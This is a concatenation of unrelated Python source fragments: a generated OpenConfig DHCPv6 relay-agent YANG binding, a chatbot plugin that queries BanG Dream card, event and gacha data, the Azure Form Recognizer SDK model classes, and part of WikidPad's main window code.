self.__sent_interface_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="sent-interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)
def _get_sent_remote_id(self):
"""
Getter method for sent_remote_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/sent_remote_id (string)
YANG Description: Reflects the DHCPv6 OPTION_REMOTE_ID (37) sent to the
server by the system.
"""
return self.__sent_remote_id
def _set_sent_remote_id(self, v, load=False):
"""
Setter method for sent_remote_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/sent_remote_id (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_sent_remote_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_sent_remote_id() directly.
YANG Description: Reflects the DHCPv6 OPTION_REMOTE_ID (37) sent to the
server by the system.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="sent-remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """sent_remote_id must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="sent-remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)""",
})
| |
import collections
import datetime
import json
import os
import random
import re
import globals
from crawlers.bestdori import CardTable, EventTable, GachaTable
from nonebot.adapters.cqhttp import Message, MessageSegment
from utils import ImageProcesser
from utils.Asset import ImageAsset
class Card:
def __init__(self):
self.card_table = CardTable(os.path.join(globals.datapath, 'bestdori.db'))
self._mapping = {
'characterId': {
'户山香澄': 1, '香澄': 1, 'kasumi': 1, 'ksm': 1,
'花园多惠': 2, '多惠': 2, 'tae': 2, 'otae': 2, ''
'牛込里美': 3, '里美': 3, 'rimi': 3,
'山吹沙绫': 4, '沙绫': 4, 'saya': 4,
'市谷有咲': 5, '有咲': 5, 'arisa': 5, 'ars': 5,
'美竹兰': 6, '兰': 6, 'ran': 6,
'青叶摩卡': 7, '摩卡': 7, 'moca': 7,
'上原绯玛丽': 8, '绯玛丽': 8, 'hmr': 8, 'himari': 8,
'宇田川巴': 9, '巴': 9, 'tomoe': 9,
'羽泽鸫': 10, '鸫': 10, 'tsugumi': 10, 'tgm': 10,
'弦卷心': 11, '心': 11, 'kkr': 11, 'kokoro': 11,
'濑田薰': 12, '薰': 12, 'kaoru': 12, 'kor': 12,
'北泽育美': 13, '育美': 13, 'hagumi': 13, 'hgm': 13,
'松原花音': 14, '花音': 14, 'kanon': 14,
'奥泽美咲': 15, '米歇尔': 15, '美咲': 15, 'misaki': 15, 'msk': 15,
'丸山彩': 16, '彩': 16, 'aya': 16,
'冰川日菜': 17, '日菜': 17, 'hina': 17,
'白鹭千圣': 18, '千圣': 18, 'chisato': 18, 'cst': 18,
'大和麻弥': 19, '麻弥': 19, 'maya': 19,
'若宫伊芙': 20, '伊芙': 20, 'eve': 20,
'凑友希那': 21, '友希那': 21, 'yukina': 21, 'ykn': 21,
'冰川纱夜': 22, '纱夜': 22, 'sayo': 22,
'今井莉莎': 23, '莉莎': 23, 'lisa': 23,
'宇田川亚子': 24, '亚子': 24, 'ako': 24,
'白金燐子': 25, '燐子': 25, 'rinko': 25,
},
'bandId': {
'ppp': 1,
'ag': 2, 'afterglow': 2,
'hhw': 3,
'pp': 4,
'roselia': 5
},
'rarity': {
'1x': 1, '一星': 1, '1星': 1,
'2x': 2, '二星': 2, '2星': 2,
'3x': 3, '三星': 3, '3星': 3,
'4x': 4, '四星': 4, '4星': 4,
},
'attribute': {
'powerful': 'powerful', '红': 'powerful',
'cool': 'cool', '蓝': 'cool',
'happy': 'happy', '橙': 'happy',
'pure': 'pure', '绿': 'pure',
},
'type': {
'初始': 'initial',
'无期限': 'permanent',
'限定': 'limited', '期间限定': 'limited',
'活动': 'event',
'联名合作': 'campaign',
'其他': 'others',
},
'skillId': {
'分': [1, 2, 3, 4, 17, 18, 20, 21, 22, 25, 26], '分卡': [1, 2, 3, 4, 17, 18, 20, 21, 22, 25, 26],
'奶': [8, 9, 10, 13, 14, 15, 16], '奶卡': [8, 9, 10, 13, 14, 15, 16],
'判': [5, 6, 7, 11, 12, 15, 16], '判卡': [5, 6, 7, 11, 12, 15, 16],
'盾': [23, 24], '盾卡': [23, 24],
'115': 20, '115分': 20,
'110': [18, 26], '110分': [18, 26],
'100': 4, '100分': 4,
}
}
with open(os.path.join(globals.datapath, 'json', 'all_skills.json'), 'r', encoding='utf-8') as f:
self._all_skills = json.load(f)
self._types = {
'initial': '初始',
'permanent': '无期限',
'limited': '期间限定',
'event': '活动',
'campaign': '联名合作',
'others': '其他',
}
self._skill_types = {
1: '10%分',
2: '30%分',
3: '60%分',
4: '100%分',
5: 'great判&10%分',
6: 'good判&20%分',
7: 'bad判&40%分',
8: '300奶&10%分',
9: '450奶&20%分',
10: '750奶&40%分',
11: 'great判&30%分',
12: 'good判&60%分',
13: '300奶&30%分',
14: '450奶&60%分',
15: '300奶&great判',
16: '450奶&good判',
17: '65%分|55%分(900)',
18: '110%分|90%分(900)',
20: '115%分',
21: '40%分|450奶(600)',
22: '80%分|500奶(600)',
23: '盾|10%分',
24: '盾|30%分',
25: '65%分|55%分(great)',
26: '110%分|90%分(great)',
}
def _parse_query_command(self, string):
string = string.split()
if string[0] == '查卡' and len(string) > 1: # avoid query of all cards
constraint = collections.OrderedDict()
for c in string[1:]:
valid_parameter = False
if c == '露佬':
return '露佬'
for attribute, attribute2id in self._mapping.items():
if c.lower() in attribute2id:
if constraint.get(attribute) is None:
constraint[attribute] = []
if type(attribute2id[c.lower()]) is list:
constraint[attribute] += attribute2id[c.lower()]
else:
constraint[attribute].append(attribute2id[c.lower()])
valid_parameter = True
break
if not valid_parameter:
return {}
return constraint
def _detail(self, cid):
try:
name, skill_id, performance, technique, visual, type_, resource_set_name, rarity, attribute, band_id = self.card_table.select_by_single_value(
'name', 'skillId', 'performance', 'technique', 'visual', 'type',
'resourceSetName', 'rarity', 'attribute', 'bandId',
id=cid)[0]
except:
return '', '', -1, '', -1
else:
skill_id = str(skill_id)
skill_description = self._all_skills[skill_id]['simpleDescription'][3] or self._all_skills[skill_id]['simpleDescription'][
0] or self._all_skills[skill_id]['simpleDescription'][2] or self._all_skills[skill_id]['simpleDescription'][1]
skill_description = skill_description.replace('\n', '') + f' ({",".join([str(round(n, 1)) for n in self._all_skills[skill_id]["duration"]])})'
overall = f'{performance}/{technique}/{visual}/{performance + technique + visual}'
return f'\n标题: {name}\n种类: {self._types[type_]}\n三围: {overall}\n技能: {skill_description}', resource_set_name, rarity, attribute, band_id
class Event:
def __init__(self, card_table):
self.event_table = EventTable(os.path.join(globals.datapath, 'bestdori.db'))
self.card_table = card_table
self._mapping = {
'attribute': {
'powerful': 'powerful', '红': 'powerful',
'cool': 'cool', '蓝': 'cool',
'happy': 'happy', '橙': 'happy',
'pure': 'pure', '绿': 'pure',
},
'eventType': {
'一般活动': 'story',
'竞演LIVE': 'versus', '对邦': 'versus',
'挑战LIVE': 'challenge', 'cp': 'challenge',
'LIVE试炼': 'live_try',
'任务LIVE': 'mission_live',
},
}
self._type = {
'story': '一般活动',
'versus': '竞演LIVE',
'challenge': '挑战LIVE',
'live_try': 'LIVE试炼',
'mission_live': '任务LIVE',
}
self._gacha_type = {
'permanent': '无期限',
'limited': '期间限定',
'special': '特殊',
}
self._server = {
'日服': 0,
'国际服': 1,
'台服': 2,
'国服': 3,
'韩服': 4,
}
self._server_name = {
0: 'jp',
1: 'en',
2: 'tw',
3: 'cn',
4: 'kr',
}
with open(os.path.join(globals.datapath, 'json', 'event_gacha.json'), 'r', encoding='utf-8') as f:
self._event_gacha = json.load(f)['event2gacha']
def _parse_query_command(self, string):
string = string.split()
if string[0] == '活动列表':
constraint = collections.OrderedDict()
for c in string[1:]:
valid_parameter = False
for attribute, attribute2id in self._mapping.items():
if c.lower() in attribute2id:
if constraint.get(attribute) is None:
constraint[attribute] = []
if type(attribute2id[c.lower()]) is list:
constraint[attribute] += attribute2id[c.lower()]
else:
constraint[attribute].append(attribute2id[c.lower()])
valid_parameter = True
break
if not valid_parameter:
return None
return constraint
def _detail_ver2(self, eid, server):
res = self.event_table.select_by_single_value('bannerAssetBundleName', id=eid)
if res:
banner_asset_bundle_name, = res[0]
if banner_asset_bundle_name:
detail = Message()
with open(os.path.join(globals.datapath, 'json', 'events', f'{eid}.json'), 'r', encoding='utf-8') as f:
event_data = json.load(f)
if event_data["startAt"][server]:
file_path = os.path.join(globals.asset_event_path, self._server_name[server], f'{banner_asset_bundle_name}.png')
if os.access(file_path, os.R_OK):
detail.append(MessageSegment.image(ImageAsset.image_path(file_path)))
detail.append(MessageSegment.text('\n'.join([f'{key}: {value}' for key, value in {
'标题': event_data['eventName'][server],
'种类': self._type[event_data['eventType']],
'开始时间': f'{(datetime.datetime.utcfromtimestamp(int(event_data["startAt"][server]) // 1000) + datetime.timedelta(hours=8)).strftime("%Y-%m-%d %H:%M:%S")}(北京时间)',
'结束时间': f'{(datetime.datetime.utcfromtimestamp(int(event_data["endAt"][server]) // 1000) + datetime.timedelta(hours=8)).strftime("%Y-%m-%d %H:%M:%S")}(北京时间)',
}.items()])))
detail.append(MessageSegment.text('\n属性: '))
[(detail.append(MessageSegment.image(ImageAsset.image_path(os.path.join(globals.asset_resource_path, f'{a["attribute"]}.png')))),
detail.append(MessageSegment.text(f'+{a["percent"]}%'))) for a in event_data['attributes']]
detail.append(MessageSegment.text('\n角色: '))
images = [[
ImageProcesser.open_nontransparent(os.path.join(globals.asset_resource_path, f'chara_icon_{c["characterId"]}.png')) or
ImageProcesser.white_padding(420, 140),
] for c in event_data['characters']]
texts = [f'+{c["percent"]}%' for c in event_data['characters']]
character_raw = ImageProcesser.thumbnail(
images=images,
labels=texts,
col_num=len(images),
row_space=5,
)
detail.append(MessageSegment.image(character_raw))
detail.append(MessageSegment.text('\n奖励: '))
cards = self.card_table.select('id', 'resourceSetName', 'rarity', 'attribute', 'bandId', id=event_data['rewardCards'])
rewards_raw = ImageProcesser.thumbnail(
images=[ImageProcesser.merge_image(c[1], c[2], c[3], c[4], thumbnail=True, trained=False) or
ImageProcesser.white_padding(420, 140)
for c in cards],
labels=[str(c[0]) for c in cards],
col_num=len(cards),
row_space=5,
)
detail.append(MessageSegment.image(rewards_raw))
if self._event_gacha[server].get(str(eid)):
detail.append(MessageSegment.text('\n关联卡池: '))
for gacha_id in self._event_gacha[server][str(eid)]:
with open(os.path.join(globals.datapath, 'json', 'gachas', f'{gacha_id}.json'), 'r', encoding='utf-8') as f:
gacha_data = json.load(f)
new_cards = [card for card in gacha_data['newCards'] if gacha_data['details'][server][str(card)]['pickup']]
if new_cards:
file_path = os.path.join(globals.asset_gacha_path, self._server_name[server], f'{gacha_data["bannerAssetBundleName"]}.png')
if os.access(file_path, os.R_OK):
detail.append(MessageSegment.image(ImageAsset.image_path(file_path)))
detail.append(MessageSegment.text('\n'.join([f'{key}: {value}' for key, value in {
'标题': gacha_data['gachaName'][server],
'种类': self._gacha_type[gacha_data['type']],
'ID': str(gacha_id),
}.items()])))
detail.append(MessageSegment.text('\nPICK UP: '))
cards = self.card_table.select('id', 'resourceSetName', 'rarity', 'attribute', 'bandId', id=new_cards)
pickups_raw = ImageProcesser.thumbnail(
images=[ImageProcesser.merge_image(c[1], c[2], c[3], c[4], thumbnail=True, trained=False) or
ImageProcesser.white_padding(420, 140)
for c in cards],
labels=[str(c[0]) for c in cards],
col_num=len(cards),
row_space=5,
)
detail.append(MessageSegment.image(pickups_raw))
else:
detail.extend([MessageSegment.text('活动尚未开始,查查别的服务器吧'), MessageSegment.image(ImageAsset.static_image('kkr/amazed.gif'))])
return detail
class Gacha:
def __init__(self, card_table):
self.gacha_table = GachaTable(os.path.join(globals.datapath, 'bestdori.db'))
self.card_table = card_table
self._mapping = {
'type': {
'常驻': 'permanent', '无期限': 'permanent',
'限时': 'limited', '限定': 'limited', '期间限定': 'limited',
'特殊': 'special',
},
'fixed4star': {
'必4': 1, '必四': 1,
}
}
self._type = {
'permanent': '无期限',
'limited': '期间限定',
'special': '特殊',
}
self._event_type = {
'story': '一般活动',
'versus': '竞演LIVE',
'challenge': '挑战LIVE',
'live_try': 'LIVE试炼',
'mission_live': '任务LIVE',
}
self._server = {
'日服': 0,
'国际服': 1,
'台服': 2,
'国服': 3,
'韩服': 4,
}
self._server_name = {
0: 'jp',
1: 'en',
2: 'tw',
3: 'cn',
4: 'kr',
}
with open(os.path.join(globals.datapath, 'json', 'event_gacha.json'), 'r', encoding='utf-8') as f:
self._gacha_event = json.load(f)['gacha2event']
def _parse_query_command(self, string):
string = string.split()
if string[0] == '卡池列表':
constraint = collections.OrderedDict()
for c in string[1:]:
valid_parameter = False
for attribute, attribute2id in self._mapping.items():
if c.lower() in attribute2id:
if constraint.get(attribute) is None:
constraint[attribute] = []
if type(attribute2id[c.lower()]) is list:
constraint[attribute] += attribute2id[c.lower()]
else:
constraint[attribute].append(attribute2id[c.lower()])
valid_parameter = True
break
if not valid_parameter:
return None
return constraint
def _detail(self, eid, server):
res = self.gacha_table.select_by_single_value('bannerAssetBundleName', 'resourceName', id=eid)
if res:
detail = Message()
banner_asset_bundle_name, resourceName = res[0]
with open(os.path.join(globals.datapath, 'json', 'gachas', f'{eid}.json'), 'r', encoding='utf-8') as f:
gacha_data = json.load(f)
if gacha_data["publishedAt"][server]:
file_path = os.path.join(globals.asset_gacha_path, self._server_name[server], f'{banner_asset_bundle_name}.png')
if os.access(file_path, os.R_OK):
detail.append(MessageSegment.image(ImageAsset.image_path(file_path)))
else:
file_path = os.path.join(globals.asset_gacha_path, resourceName, self._server_name[server], 'logo.png')
if os.access(file_path, os.R_OK):
detail.append(MessageSegment.image(ImageAsset.image_path(file_path)))
detail.append(MessageSegment.text('\n'.join([f'{key}: {value}' for key, value in {
'标题': gacha_data['gachaName'][server],
'种类': self._type[gacha_data['type']],
'开始时间': f'{(datetime.datetime.utcfromtimestamp(int(gacha_data["publishedAt"][server]) // 1000) + datetime.timedelta(hours=8)).strftime("%Y-%m-%d %H:%M:%S")}(北京时间)',
'结束时间': f'{(datetime.datetime.utcfromtimestamp(int(gacha_data["closedAt"][server]) // 1000) + datetime.timedelta(hours=8)).strftime("%Y-%m-%d %H:%M:%S")}(北京时间)',
}.items()])))
new_cards = [card for card in gacha_data['newCards'] if gacha_data['details'][server][str(card)]['pickup']]
if new_cards:
detail.append(MessageSegment.text('\nPICK UP: '))
cards = self.card_table.select('id', 'resourceSetName', 'rarity', 'attribute', 'bandId', id=gacha_data['newCards'])
rewards = ImageProcesser.thumbnail(
images=[ImageProcesser.merge_image(c[1], c[2], c[3], c[4], thumbnail=True, trained=False) for c in cards],
labels=[str(c[0]) for c in cards],
| |
<filename>sdk/formrecognizer/azure-ai-formrecognizer/azure/ai/formrecognizer/_models.py<gh_stars>1-10
# coding=utf-8
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
# pylint: disable=protected-access, too-many-lines
from typing import Any, Iterable, List
from enum import Enum
from collections import namedtuple
from ._generated.v2022_01_30_preview.models import ModelInfo, Error
from ._helpers import (
adjust_value_type,
adjust_confidence,
get_element,
adjust_text_angle,
_get_deserialize,
)
def prepare_document_spans(spans):
return [DocumentSpan._from_generated(span) for span in spans] if spans else []
def prepare_bounding_regions(regions):
return (
[BoundingRegion._from_generated(region) for region in regions]
if regions
else []
)
def get_bounding_box(field):
return (
[
Point(x=field.bounding_box[0], y=field.bounding_box[1]),
Point(x=field.bounding_box[2], y=field.bounding_box[3]),
Point(x=field.bounding_box[4], y=field.bounding_box[5]),
Point(x=field.bounding_box[6], y=field.bounding_box[7]),
]
if field.bounding_box
else None
)
def resolve_element(element, read_result):
element_type, element, page = get_element(element, read_result)
if element_type == "word":
return FormWord._from_generated(element, page=page)
if element_type == "line":
return FormLine._from_generated(element, page=page)
if element_type == "selectionMark":
return FormSelectionMark._from_generated(element, page=page)
raise ValueError("Failed to parse element reference.")
def get_field_value(
field, value, read_result
): # pylint: disable=too-many-return-statements
if value is None:
return value
if value.type == "string":
return value.value_string
if value.type == "number":
return value.value_number
if value.type == "integer":
return value.value_integer
if value.type == "date":
return value.value_date
if value.type == "phoneNumber":
return value.value_phone_number
if value.type == "time":
return value.value_time
if value.type == "array":
return (
[
FormField._from_generated(field, value, read_result)
for value in value.value_array
]
if value.value_array
else []
)
if value.type == "object":
return (
{
key: FormField._from_generated(key, value, read_result)
for key, value in value.value_object.items()
}
if value.value_object
else {}
)
if value.type == "selectionMark":
return value.value_selection_mark
if value.type == "countryRegion":
return value.value_country_region
return None
def get_field_value_v3(value): # pylint: disable=too-many-return-statements
if value is None:
return value
if value.type == "string":
return value.value_string
if value.type == "number":
return value.value_number
if value.type == "integer":
return value.value_integer
if value.type == "date":
return value.value_date
if value.type == "phoneNumber":
return value.value_phone_number
if value.type == "time":
return value.value_time
if value.type == "signature":
return value.value_signature
if value.type == "array":
return (
[DocumentField._from_generated(value) for value in value.value_array]
if value.value_array
else []
)
if value.type == "currency":
return CurrencyValue._from_generated(value.value_currency)
if value.type == "object":
return (
{
key: DocumentField._from_generated(value)
for key, value in value.value_object.items()
}
if value.value_object
else {}
)
if value.type == "selectionMark":
return value.value_selection_mark
if value.type == "countryRegion":
return value.value_country_region
return None
class DocumentBuildMode(str, Enum):
"""The mode used when building custom models.
For more information, see https://aka.ms/azsdk/formrecognizer/buildmode.
"""
NEURAL = "neural"
TEMPLATE = "template"
class FieldValueType(str, Enum):
"""Semantic data type of the field value.
.. versionadded:: v2.1
The *selectionMark* and *countryRegion* values
"""
STRING = "string"
DATE = "date"
TIME = "time"
PHONE_NUMBER = "phoneNumber"
FLOAT = "float"
INTEGER = "integer"
LIST = "list"
DICTIONARY = "dictionary"
SELECTION_MARK = "selectionMark"
COUNTRY_REGION = "countryRegion"
class LengthUnit(str, Enum):
"""The unit used by the width, height and bounding box properties.
For images, the unit is "pixel". For PDF, the unit is "inch".
"""
PIXEL = "pixel"
INCH = "inch"
class TrainingStatus(str, Enum):
"""Status of the training operation."""
SUCCEEDED = "succeeded"
PARTIALLY_SUCCEEDED = "partiallySucceeded"
FAILED = "failed"
class CustomFormModelStatus(str, Enum):
"""Status indicating the model's readiness for use."""
CREATING = "creating"
READY = "ready"
INVALID = "invalid"
class FormContentType(str, Enum):
"""Content type for upload.
.. versionadded:: v2.1
Support for image/bmp
"""
APPLICATION_PDF = "application/pdf"
IMAGE_JPEG = "image/jpeg"
IMAGE_PNG = "image/png"
IMAGE_TIFF = "image/tiff"
IMAGE_BMP = "image/bmp"
class Point(namedtuple("Point", "x y")):
"""The x, y coordinate of a point on a bounding box.
:ivar float x: x-coordinate
:ivar float y: y-coordinate
.. versionadded:: v2.1
Support for *to_dict* and *from_dict* methods
"""
__slots__ = ()
def __new__(cls, x, y):
return super(Point, cls).__new__(cls, x, y)
def to_dict(self):
# type: () -> dict
"""Returns a dict representation of Point.
:return: dict
:rtype: dict
"""
return {"x": self.x, "y": self.y}
@classmethod
def from_dict(cls, data):
# type: (dict) -> Point
"""Converts a dict in the shape of a Point to the model itself.
:param dict data: A dictionary in the shape of Point.
:return: Point
:rtype: Point
"""
return cls(x=data.get("x", None), y=data.get("y", None))
class FormPageRange(namedtuple("FormPageRange", "first_page_number last_page_number")):
"""The 1-based page range of the form.
:ivar int first_page_number: The first page number of the form.
:ivar int last_page_number: The last page number of the form.
.. versionadded:: v2.1
Support for *to_dict* and *from_dict* methods
"""
__slots__ = ()
def __new__(cls, first_page_number, last_page_number):
return super(FormPageRange, cls).__new__(
cls, first_page_number, last_page_number
)
def to_dict(self):
# type: () -> dict
"""Returns a dict representation of FormPageRange.
:return: dict
:rtype: dict
"""
return {
"first_page_number": self.first_page_number,
"last_page_number": self.last_page_number,
}
@classmethod
def from_dict(cls, data):
# type: (dict) -> FormPageRange
"""Converts a dict in the shape of a FormPageRange to the model itself.
:param dict data: A dictionary in the shape of FormPageRange.
:return: FormPageRange
:rtype: FormPageRange
"""
return cls(
first_page_number=data.get("first_page_number", None),
last_page_number=data.get("last_page_number", None),
)
class FormElement(object):
"""Base type which includes properties for a form element.
:ivar str text: The text content of the element.
:ivar list[~azure.ai.formrecognizer.Point] bounding_box:
A list of 4 points representing the quadrilateral bounding box
that outlines the text. The points are listed in clockwise
order: top-left, top-right, bottom-right, bottom-left.
Units are in pixels for images and inches for PDF.
:ivar int page_number:
The 1-based number of the page in which this content is present.
:ivar str kind:
The kind of form element. Possible kinds are "word", "line", or "selectionMark" which
correspond to a :class:`~azure.ai.formrecognizer.FormWord` :class:`~azure.ai.formrecognizer.FormLine`,
or :class:`~azure.ai.formrecognizer.FormSelectionMark`, respectively.
.. versionadded:: v2.1
Support for *to_dict* and *from_dict* methods
"""
def __init__(self, **kwargs):
self.bounding_box = kwargs.get("bounding_box", None)
self.page_number = kwargs.get("page_number", None)
self.text = kwargs.get("text", None)
self.kind = kwargs.get("kind", None)
def to_dict(self):
# type: () -> dict
"""Returns a dict representation of FormElement.
:return: dict
:rtype: dict
"""
return {
"text": self.text,
"bounding_box": [f.to_dict() for f in self.bounding_box]
if self.bounding_box
else [],
"page_number": self.page_number,
"kind": self.kind,
}
@classmethod
def from_dict(cls, data):
# type: (dict) -> FormElement
"""Converts a dict in the shape of a FormElement to the model itself.
:param dict data: A dictionary in the shape of FormElement.
:return: FormElement
:rtype: FormElement
"""
return cls(
text=data.get("text", None),
page_number=data.get("page_number", None),
kind=data.get("kind", None),
bounding_box=[Point.from_dict(f) for f in data.get("bounding_box")] # type: ignore
if len(data.get("bounding_box", [])) > 0
else [],
)
class RecognizedForm(object):
"""Represents a form that has been recognized by a trained or prebuilt model.
The `fields` property contains the form fields that were extracted from the
form. Tables, text lines/words, and selection marks are extracted per page
and found in the `pages` property.
:ivar str form_type:
The type of form the model identified the submitted form to be.
:ivar str form_type_confidence:
Confidence of the type of form the model identified the submitted form to be.
:ivar str model_id:
Model identifier of model used to analyze form if not using a prebuilt
model.
:ivar fields:
A dictionary of the fields found on the form. The fields dictionary
keys are the `name` of the field. For models trained with labels,
this is the training-time label of the field. For models trained
without labels, a unique name is generated for each field.
:vartype fields: dict[str, ~azure.ai.formrecognizer.FormField]
:ivar ~azure.ai.formrecognizer.FormPageRange page_range:
The first and last page number of the input form.
:ivar list[~azure.ai.formrecognizer.FormPage] pages:
A list of pages recognized from the input document. Contains lines,
words, selection marks, tables and page metadata.
.. versionadded:: v2.1
The *form_type_confidence* and *model_id* properties, support for
*to_dict* and *from_dict* methods
"""
def __init__(self, **kwargs):
self.fields = kwargs.get("fields", None)
self.form_type = kwargs.get("form_type", None)
self.page_range = kwargs.get("page_range", None)
self.pages = kwargs.get("pages", None)
self.model_id = kwargs.get("model_id", None)
self.form_type_confidence = kwargs.get("form_type_confidence", None)
def __repr__(self):
return (
"RecognizedForm(form_type={}, fields={}, page_range={}, pages={}, form_type_confidence={}, "
"model_id={})".format(
self.form_type,
repr(self.fields),
repr(self.page_range),
repr(self.pages),
self.form_type_confidence,
self.model_id,
)[:1024]
)
def to_dict(self):
# type: () -> dict
"""Returns a dict representation of RecognizedForm.
:return: dict
:rtype: dict
"""
return {
"fields": {k: v.to_dict() for k, v in self.fields.items()}
if self.fields
else {},
"form_type": self.form_type,
"pages": [v.to_dict() for v in self.pages] if self.pages else [],
"model_id": self.model_id,
"form_type_confidence": self.form_type_confidence,
"page_range": self.page_range.to_dict() if self.page_range else None,
}
@classmethod
def from_dict(cls, data):
# type: (dict) -> RecognizedForm
"""Converts a dict in the shape of a RecognizedForm to the model itself.
:param dict data: A dictionary in the shape of RecognizedForm.
:return: RecognizedForm
:rtype: RecognizedForm
"""
return cls(
fields={k: | |
False
if self.configuration.getint(
"main", "new_window_on_follow_wiki_url") != 1:
# Same window
self.openWiki(filePath, wikiWordsToOpen=(wikiWordToOpen,),
anchorToOpen=anchorToOpen) # ?
return True
else:
# New window
try:
clAction = CmdLineAction([])
clAction.inheritFrom(self.getCmdLineAction())
clAction.setWikiToOpen(link)
clAction.frameToOpen = 1 # Open in new frame
wx.GetApp().startPersonalWikiFrame(clAction)
return True
except Exception, e:
traceback.print_exc()
self.displayErrorMessage(_(u'Error while starting new '
u'WikidPad instance'), e)
return False
return False
def refreshPageStatus(self, docPage = None):
"""
Read information from page and present it in the field 1 of the
status bar and in the title bar.
"""
fmt = mbcsEnc(self.getConfig().get("main", "pagestatus_timeformat"),
"replace")[0]
if docPage is None:
docPage = self.getCurrentDocPage()
if docPage is None or not isinstance(docPage,
(DocPages.WikiPage, DocPages.AliasWikiPage)):
self.statusBar.SetStatusText(uniToGui(u""), 1)
return
pageStatus = u"" # wikiWord
modTime, creaTime = docPage.getTimestamps()[:2]
if modTime is not None:
# pageStatus += _(u"Mod.: %s") % \
# mbcsDec(strftime(fmt, localtime(modTime)), "replace")[0]
# pageStatus += _(u"; Crea.: %s") % \
# mbcsDec(strftime(fmt, localtime(creaTime)), "replace")[0]
pageStatus += _(u"Mod.: %s") % strftimeUB(fmt, modTime)
pageStatus += _(u"; Crea.: %s") % strftimeUB(fmt, creaTime)
self.statusBar.SetStatusText(uniToGui(pageStatus), 1)
self.SetTitle(uniToGui(u"%s: %s - %s - WikidPad" %
(self.getWikiDocument().getWikiName(), docPage.getWikiWord(),
self.getWikiConfigPath(), )))
def viewWordSelection(self, title, words, motionType, default=None):
"""
View a single choice to select a word to go to
title -- Title of the dialog
words -- Sequence of the words to choose from
motionType -- motion type to set in openWikiPage if word was choosen
"""
if not self.requireReadAccess():
return
try:
dlg = AdditionalDialogs.ChooseWikiWordDialog(self, -1, words,
motionType, title, default)
dlg.CenterOnParent(wx.BOTH)
dlg.ShowModal()
dlg.Destroy()
except (IOError, OSError, DbAccessError), e:
self.lostAccess(e)
raise
def viewParents(self, ofWord):
if not self.requireReadAccess():
return
try:
parents = self.getWikiData().getParentRelationships(ofWord)
except (IOError, OSError, DbAccessError), e:
self.lostAccess(e)
raise
# Check for canonical parent to set as default selection
default = None
canonical_parent = self.getWikiDocument().getAttributeTriples(ofWord, "parent", None)
if canonical_parent:
default = canonical_parent[0][2]
# Add the canonical parent to the list if it does not exist
if default not in parents:
parents.append(default)
self.viewWordSelection(_(u"Parent nodes of '%s'") % ofWord, parents,
"parent", default)
def viewParentLess(self):
if not self.requireReadAccess():
return
try:
parentLess = self.getWikiData().getParentlessWikiWords()
except (IOError, OSError, DbAccessError), e:
self.lostAccess(e)
raise
self.viewWordSelection(_(u"Parentless nodes"), parentLess,
"random")
def viewChildren(self, ofWord):
if not self.requireReadAccess():
return
try:
children = self.getWikiData().getChildRelationships(ofWord)
except (IOError, OSError, DbAccessError), e:
self.lostAccess(e)
raise
self.viewWordSelection(_(u"Child nodes of '%s'") % ofWord, children,
"child")
def viewBookmarks(self):
if not self.requireReadAccess():
return
try:
bookmarked = [w for w,k,v in self.getWikiDocument()
.getAttributeTriples(None, "bookmarked", u"true")]
except (IOError, OSError, DbAccessError), e:
self.lostAccess(e)
raise
self.viewWordSelection(_(u"Bookmarks"), bookmarked,
"random")
def removeFromWikiHistory(self, path):
"""
Remove path from wiki history (if present) and sends an event.
"""
try:
self.wikiHistory.remove(self._getRelativeWikiPath(path))
self.informRecentWikisChanged()
except ValueError:
pass
# Try absolute
try:
self.wikiHistory.remove(path)
self.informRecentWikisChanged()
except ValueError:
pass
def lastAccessedWiki(self, wikiConfigFilename):
"""
Writes to the global config the location of the last accessed wiki
and updates file history.
"""
wikiConfigFilename = self._getStorableWikiPath(wikiConfigFilename)
if wikiConfigFilename == self.wikiPadHelp:
return
# create a new config file for the new wiki
self.configuration.set("main", "last_wiki", wikiConfigFilename)
if wikiConfigFilename not in self.wikiHistory:
self.wikiHistory = [wikiConfigFilename] + self.wikiHistory
# only keep most recent items
maxLen = self.configuration.getint(
"main", "recentWikisList_length", 5)
if len(self.wikiHistory) > maxLen:
self.wikiHistory = self.wikiHistory[:maxLen]
self.informRecentWikisChanged()
self.configuration.set("main", "last_active_dir", dirname(wikiConfigFilename))
self.writeGlobalConfig()
# Only needed for scripts
def setAutoSave(self, onOrOff):
self.autoSave = onOrOff
self.configuration.set("main", "auto_save", self.autoSave)
def setShowTreeControl(self, onOrOff):
self.windowLayouter.expandWindow("maintree", onOrOff)
if onOrOff:
self.windowLayouter.focusWindow("maintree")
def getShowToolbar(self):
return not self.GetToolBar() is None
def setShowToolbar(self, onOrOff):
"""
Control, if toolbar should be shown or not
"""
self.getConfig().set("main", "toolbar_show", bool(onOrOff))
if bool(onOrOff) == self.getShowToolbar():
# Desired state already reached
return
if onOrOff:
self.buildToolbar()
else:
self.fastSearchField = None
self.GetToolBar().Destroy()
self.SetToolBar(None)
def setShowDocStructure(self, onOrOff):
if self.windowLayouter.containsWindow("doc structure"):
self.windowLayouter.expandWindow("doc structure", onOrOff)
if onOrOff:
self.windowLayouter.focusWindow("doc structure")
else:
if onOrOff:
self.configuration.set("main", "docStructure_position", u"1")
layoutCfStr = WindowLayout.calculateMainWindowLayoutCfString(
self.configuration)
self.configuration.set("main", "windowLayout", layoutCfStr)
# Call of changeLayoutByCf() may crash so save
# data beforehand
self.saveCurrentWikiState()
self.changeLayoutByCf(layoutCfStr)
def setShowTimeView(self, onOrOff):
